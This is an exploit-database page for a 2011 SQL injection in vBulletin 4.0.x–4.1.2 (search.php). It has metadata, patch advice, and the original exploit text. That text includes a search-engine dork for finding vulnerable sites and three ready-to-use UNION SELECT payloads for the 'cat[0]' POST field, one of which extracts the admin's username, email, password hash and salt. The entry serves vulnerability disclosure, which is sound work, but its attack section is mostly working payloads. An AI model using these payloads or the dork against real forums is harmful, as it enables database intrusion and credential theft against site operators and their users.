header-logo
Suggest Exploit
vendor:
vBulletin
by:
D4rkB1t
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: vBulletin
Affected Version From: 4.0.x
Affected Version To: 4.1.2002
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks through the search.php page in vBulletin 4.0.x to 4.1.2. The attacker can execute arbitrary SQL queries and gain unauthorized access to the database.

Mitigation:

The vendor has released a patch in vb#4.1.3. It is advised to update to the latest version to mitigate the vulnerability.
Source

Exploit-DB raw data:

====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================

#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

====================================================================
# 1337day.com [2011-5-21]
====================================================================